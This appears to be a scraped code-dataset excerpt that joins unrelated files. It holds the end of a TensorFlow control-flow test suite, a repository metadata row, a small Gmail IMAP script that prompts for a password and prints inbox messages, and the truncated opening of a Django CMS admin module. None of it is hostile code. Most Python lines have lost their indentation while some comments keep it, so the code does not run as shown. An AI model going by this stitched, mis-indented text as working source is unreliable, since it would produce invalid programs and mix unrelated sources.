with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([0., 0.], sess.run(dy_dq))
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
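    # The body runs exactly once: y = cast(argmin(q)) + reduce_sum(q), so
    # dy/dq = [1., 1.].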
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([1., 1.], sess.run(dy_dq))
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
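      # The loop runs once: r = sum(ones(5) * x) = 5 * x; the norm term is
      # stopped, so dz/dx = 5.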
variables.global_variables_initializer().run()
self.assertEqual(5.0, result.eval())
def testOneValueCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
def testCase(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
      # Duplicate predicates may evaluate to true; the first one is selected.
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
      # Duplicate true predicates raise an error when exclusive=True.
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
r4.eval()
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6.eval(), 0)
def testCaseSideEffects(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
def testOneOpCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.Variable(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
      # Ensure the fetched value of 'c' is unchanged.
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.Variable([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.Variable([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.Variable([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.Variable([0.0])
v2 = variables.Variable([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.Variable(p1, validate_shape=False)
v2 = variables.Variable(p2, validate_shape=False)
v3 = variables.Variable(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.Variable([[1, 2]])
v2 = variables.Variable([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.Variable([[1, 2]])
v2 = variables.Variable([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.Variable([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.Variable(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
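      # Four squarings: 2 -> 4 -> 16 -> 256 -> 65536.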
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
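      # Two applications of x**4 give 2 -> 16 -> 65536; r[1] = x**16, so
      # dr/dx = 16 * x**15 = 524288 at x = 2.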
self.assertEqual(r[1].eval(), 65536.0)
r = gradients_impl.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"]),
1)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.Variable([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.Variable([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.Variable(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
var = variables.Variable(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
      self.assertEqual(1, var.eval())
class AssertTest(test.TestCase):
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.test_session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
      steps: Total number of repeated steps to run the loop.

    Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
sess.run(variables.global_variables_initializer())
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
# exclude warm up time
sess.run(r)
start_time = time.time()
for _ in xrange(num_iters):
sess.run(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_cond_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| apache-2.0 | 5,589,263,064,231,256,000 | 34.988483 | 112 | 0.609403 | false |
AstroTech/workshop-python | network/src/imap-gmail.py | 1 | 1379 | import getpass
import imaplib
import email
from pprint import pprint
from quopri import decodestring
from datetime import datetime
USERNAME = getpass.getuser()
PASSWORD = getpass.getpass()
HOST = 'imap.gmail.com'
PORT = 993
imap = imaplib.IMAP4_SSL(HOST, PORT)
imap.login(USERNAME, PASSWORD)
imap.select('INBOX')
def get_str(text):
return decodestring(text).decode()
def get_date(text):
try:
        return datetime.strptime(text, '%a, %d %b %Y %H:%M:%S %z')
except ValueError:
return text
def get_body(msg):
type = msg.get_content_maintype()
if type == 'multipart':
for part in msg.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload(decode=True).decode('utf-8')
elif type == 'text':
return msg.get_payload(decode=True).decode('utf-8')
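# Note on get_body above: for a multipart message it returns the first
# text/* part found; decoding as UTF-8 is an assumption of this script --
# other charsets would need Content-Type inspection.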
status, data = imap.search(None, 'ALL')
# status: OK
# data: [b'1 2 3 4 ...']
for num in data[0].split():
status, data = imap.fetch(num, '(RFC822)')
mail = email.message_from_string(data[0][1].decode())
headers = dict(mail._headers)
mail = {
'to': get_str(headers['To']),
'sender': get_str(headers['From']),
'subject': get_str(headers['Subject']),
'date': get_date(headers['Date']),
'body': get_body(mail)
}
pprint(mail)
imap.close()
imap.logout()
| mit | 7,039,509,036,235,123,000 | 22.372881 | 77 | 0.618564 | false |
uhuramedia/Havel | HavelCMS/admin.py | 1 | 7900 | import datetime
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.options import FORMFIELD_FOR_DBFIELD_DEFAULTS
from django.core import urlresolvers
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.importlib import import_module
from django.utils.translation import ugettext_lazy as _
from feincms.admin.tree_editor import TreeEditor as _feincms_tree_editor
from mptt.admin import MPTTModelAdmin
from mptt.forms import MPTTAdminForm, TreeNodeChoiceField
from HavelCMS.models import ResourceProperty, Page, Weblink, Resource, \
ResourceTranslation, ResourceCollection, ResourceCollectionItem, File
from contrib.attachments.admin import FileLinkInline, LinkInline
def get_class_from_string(str):
path = str
i = path.rfind('.')
module, attr = path[:i], path[i + 1:]
try:
mod = import_module(module)
return getattr(mod, attr)
except ImportError, e:
